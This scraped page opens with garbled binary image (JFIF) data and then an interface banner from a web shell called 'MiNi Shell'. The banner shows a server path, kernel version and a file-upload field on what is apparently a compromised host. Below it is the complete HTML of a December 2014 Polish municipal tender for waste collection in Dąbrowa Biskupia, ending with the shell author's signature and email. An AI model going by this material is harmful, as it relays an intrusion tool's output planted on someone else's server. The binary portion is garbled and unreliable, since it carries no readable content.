JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141206/400904-N-2014.html

<p class="kh_header"><b>Dąbrowa Biskupia: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Dąbrowa Biskupia</b><br>
<b>Numer ogłoszenia: 400904 - 2014; data zamieszczenia: 06.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Biskupia , Ul. Topolowa 2, 88-133 Dąbrowa Biskupia, woj. kujawsko-pomorskie, tel. (052) 351 21 70, faks (052) 351 21 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.dabrowabiskupia.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Dąbrowa Biskupia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa :
Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Dąbrowa Biskupia
Przedmiot zamówienia obejmuje:
-   odbiór i zagospodarowanie odpadów komunalnych segregowanych i zmieszanych z nieruchomości zamieszkałych z terenu gminy Dąbrowa Biskupia,
 -   odbiór i zagospodarowanie odpadów komunalnych segregowanych i zmieszanych z nieruchomości niezamieszkałych z terenu gminy Dąbrowa Biskupia,
-   odbiór i zagospodarowanie odpadów komunalnych z miejsc publicznie dostępnych na terenie gminy Dąbrowa Biskupia tj. kosze uliczne, kosze przystankowe, place zabaw boiska , świetlice, oczyszczalnia ścieków i hydrofornie, 
 -   wyposażenie Punktu Selektywnej Zbiórki Odpadów Komunalnych w Dąbrowie Biskupiej zwanym dalej PSZOK w pojemniki i  kontenery ,
 -   odbieranie i zagospodarowanie odpadów komunalnych z PSZOK w Dąbrowie Biskupiej,
 -   dokumentowanie realizacji przedmiotu zamówienia za pomocą raportów (sprawozdań), kart przekazania odpadu, kart przekazania do recyklingu lub odzysku, kart charakterystyki odpadu .  
Liczba mieszkańców Gminy Dąbrowa Biskupia objętych zbiórką odpadów komunalnych :  4335 osób (na dzień 30.11.2014r według złożonych deklaracji).
Ilość nieruchomości zamieszkałych na terenie Gminy Dąbrowa Biskupia objętych zbiórką odpadów komunalnych (wg złożonych na dzień 30.11.2014r deklaracji ) - 1296 w tym : 
- deklarujących segregowanie odpadów - 975
- deklarujących  nie segregowanie odpadów - 321
Ilość nieruchomości niezamieszkałych, na których powstają odpady komunalne (wg złożonych deklaracji) : 78. 
Szczegółowy wykaz ilości nieruchomości w poszczególnych miejscowościach określa załącznik nr 11 do SIWZ.
Średnio szacuje się, że w trakcie trwania umowy  ilości odpadów komunalnych wyniesie  720 Mg w tym:
1/	odpady niesegregowane (zmieszane)  - ok. 470 Mg,
2/	odpady wysegregowane - ok. 150  Mg,
3/	odpady z PSZOK - ok. 100 Mg.

Podane ilości odpadów mogą ulec zmniejszeniu w trakcie realizacji umowy i z tego tytułu nie przysługuje Wykonawcy żadne roszczenie wobec Zamawiającego.
Wykonawca z nieruchomości zamieszkałych i niezamieszkałych na terenie Gminy Dąbrowa Biskupia będzie odbierał następujące frakcje odpadów komunalnych: papier i tektura, tworzywa sztuczne, opakowania wielomateriałowe i metale, szkło, odpady zielone ulegające biodegradacji, zmieszane odpady komunalne, czyli odpady komunalne o kodach:
15 01 01     Opakowania z papieru i tektury,  
15 01 02     Opakowania z tworzyw sztucznych,
15 01 04     Opakowania z metali ,
15 01 07     Opakowania ze szkła, 
20 01 01     Papier i tektura,
20 01 02     Szkło,     
20 01 08     Odpady kuchenne ulegające biodegradacji, 
20 02 01     Odpady ulegające biodegradacji ,
20 03 01     Niesegregowane (zmieszane) odpady komunalne. 

Wykonawca będzie odbierał z Punktu Selektywnej Zbiórki Odpadów Komunalnych ( PSZOK) i zagospodarowywał następujące frakcje odpadów komunalnych o kodach: 
20 01 01     Papier i tektura,
20 01 02     Szkło,   
20 03 07     Odpady wielkogabarytowe,  
17 01 01     Odpady betonu oraz gruz betonowy z rozbiórek i remontów, 
17 01 02     Gruz ceglany,  
16 01 03     Zużyte opony,
20 02 01     Odpady ulegające biodegradacji , 
20 01 33*    Baterie i akumulatory łącznie z bateriami i akumulatorami wymienionymi w 16 06 01,  
                     16 06 02 lub 16 06 03 oraz niesortowane baterie i akumulatory zawierające te baterie,
20 01 35*   Zużyte urządzenia elektryczne i elektroniczne inne niż  wymienione w 20 01 21 
                   i 20 01 23 zawierające niebezpieczne składniki (1), 
20	01 31*   Leki cytotoksyczne i cytostatyczne,   
20 01 32     Leki inne niż wymienione w 20 01 31 

Wykonawca zobowiązany jest do odbioru odpadów w sposób uniemożliwiający mieszanie odpadów komunalnych zmieszanych z segregowanymi i uniemożliwiający mieszanie poszczególnych frakcji odpadów segregowanych.
Do zadań Wykonawcy należeć będzie również wyposażenie PSZOK w pojemniki i kontenery oraz odbieranie i zagospodarowanie odpadów komunalnych z PSZOK w Dąbrowie Biskupiej.
PSZOK zlokalizowany jest na działce nr 54/6  w Dąbrowie Biskupiej.

Częstotliwość odbioru odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych, na których powstają odpady komunalne z terenu Gminy Dąbrowa Biskupia:
-  odpady komunalne zmieszane - raz w miesiącu,
-  papier i tektura, - raz w miesiącu,
-  metale, tworzywa sztuczne, opakowania wielomateriałowe - raz w miesiącu,
-  szkło - raz w miesiącu,
-  odpady ulegające biodegradacji i odpady zielone w okresie od 1 kwietnia do 31 października - raz na dwa tygodnie, a w okresie od 1 listopada do 31 marca raz na dwa miesiące.
-  odpady komunalne gromadzone w koszach ulicznych, przy boiskach, świetlicach wiejskich, przy Urzędzie Gminy , na oczyszczalni , parkach, placach zabaw - raz w miesiącu.
 -  odbieranie odpadów z PSZOK odbywać się będzie na telefoniczne zgłoszenie z Urzędu Gminy Dąbrowa Biskupia.
Szczegółowy opis przedmiotu zamówienia zawierają załączniki do SIWZ.Umowa obowiązywać będzie od dnia jej zawarcia do dnia 31.12.2015r. Odbieranie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Dąbrowa Biskupia nastąpi w terminie od 01.01.2015r. do dnia 31.12.2015r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 4 000,00 PLN przed upływem terminu składania ofert. Decyduje data wpływu środków na konto Zamawiającego. Z postępowania wyklucza się Wykonawców, którzy nie wnieśli wadium do upływu terminu składania ofert. W zależności od woli Wykonawcy wadium może być wnoszone w  jednej lub kilku następujących formach:
 -  pieniądzu,
 -  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, 
    z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
 -  gwarancjach bankowych,
 -  gwarancjach ubezpieczeniowych,
 -  poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy              z dnia  9.11.2000r. o utworzeniu PARP (Dz.U. z 2007r Nr 42 poz. 275 z późn. zm.). Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy  Zamawiającego Nr 73 9551 0002 0200 0101 2000 0005 w Banku Spółdzielczym w Piotrkowie Kujawskim Oddział w Dąbrowie Biskupiej  z dopiskiem :Wadium na przetarg - Odbiór i zagospodarowanie odpadów. 
          Potwierdzeniem tej formy wniesienia wadium jest kopia przelewu załączona do oferty. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy jeśli jego wniesienia żądano. 
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. Zamawiający zatrzyma wadium jeśli zajdą okoliczności określone w art. 46 ust. 4a i 5 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeśli Wykonawca wykaże, że: 
          a) jest wpisany do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Dąbrowa Biskupia w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminie (Dz. U. z 2013 r., poz. 1399 ); 
            b) posiada aktualne zezwolenie na transport odpadów komunalnych zgodnie z wymogami ustawy z dnia 14 grudnia 2012 o odpadach (Dz. U. z 2013 r., poz. 21 z późn. zm.) lub równoważne, w tym wydane na podstawie wcześniejszych przepisów; 
             Ocena spełniania tego warunku udziału w postępowaniu będzie dokonana wg formuły: spełnia - nie spełnia na podstawie złożonego oświadczenia oraz aktualnego zezwolenia na transport odpadów komunalnych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli Wykonawca wykaże, że wykonał,  a w przypadku świadczeń okresowych lub ciągłych wykonuje, należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę w ramach której odbierał przez okres co najmniej kolejnych 6 miesięcy odpady komunalne z nieruchomości zamieszkałych , zmieszane  w ilości co najmniej 400 Mg oraz odpady komunalne gromadzone selektywnie (np. szkło, makulatura, tworzywa sztuczne, metale ) w ilości co najmniej 50 Mg,
        Ocena spełniania tego warunku udziału w postępowaniu będzie dokonana wg formuły: spełnia - nie spełnia na podstawie złożonego wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych  usług, oraz załączonych  dowodów określających czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym, jeśli Wykonawca wykaże, że dysponuje :
a)  pojazdami spełniającymi wymagania techniczne określone przepisami ustawy prawo o ruchu drogowym oraz Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości ( Dz.U. 2013 poz. 122):
- co najmniej dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych   
- co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych  odpadów
 komunalnych bez możliwości mieszania odpadów wyposażonymi w wagę samochodową ( w tym do odbierania selektów z kontenerów i pojemników na odpady) 
- co najmniej jednym pojazdem do odbierania odpadów bez funkcji kompaktującej ;

   b)  bazą magazynowo - transportową na terenie gminy Dąbrowa Biskupia lub w odległości nie większej niż 60 km od granicy gminy Dąbrowa Biskupia, zlokalizowaną na terenie, do którego Wykonawca posiada tytuł prawny, spełniającą wymogi określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości ( Dz. U. z 2013r , poz. 122).
        Ocena spełniania tego warunku udziału w postępowaniu będzie dokonana wg formuły: spełnia -  nie spełnia w oparciu o załączony do oferty  wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku udziału w postępowaniu będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dotyczący znajdowania się w odpowiedniej sytuacji finansowej i ekonomicznej jeśli Wykonawca przedstawi opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wartości co najmniej 100 000,00 zł ( sto tysięcy złotych),
Ocena spełniania tego warunku udziału w postępowaniu będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączoną do oferty opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że  podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz  oferty (  załącznik nr 4 do SIWZ)
2)	dowód wniesienia wadium 
3)	pełnomocnictwo do reprezentacji w przypadku składania oferty przez pełnomocników ( jeśli dotyczy). 
4)	pisemne zobowiązanie podmiotów oddających Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonaniu zamówienia (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - termin odbioru odpadów z PSZOK - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie i w granicach art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza możliwość zmiany zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy. Zmiana postanowień niniejszej umowy, może nastąpić w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej:
1/	zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
2/	wystąpienie uzasadnionych zmian w zakresie sposobu wykonania przedmiotu umowy proponowanych przez Zamawiającego lub Wykonawcę, jeśli zmiany te są korzystne dla Zamawiającego.
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Strony mogą wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej umowy jest zgoda obu Stron wyrażona na piśmie pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowabiskupia.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy  Dąbrowa Biskupia ul. Topolowa 2, 88-133 Dąbrowa Biskupia, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2014 godzina 11:00, miejsce: Urząd Gminy  Dąbrowa Biskupia ul. Topolowa 2, 88-133 Dąbrowa Biskupia, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com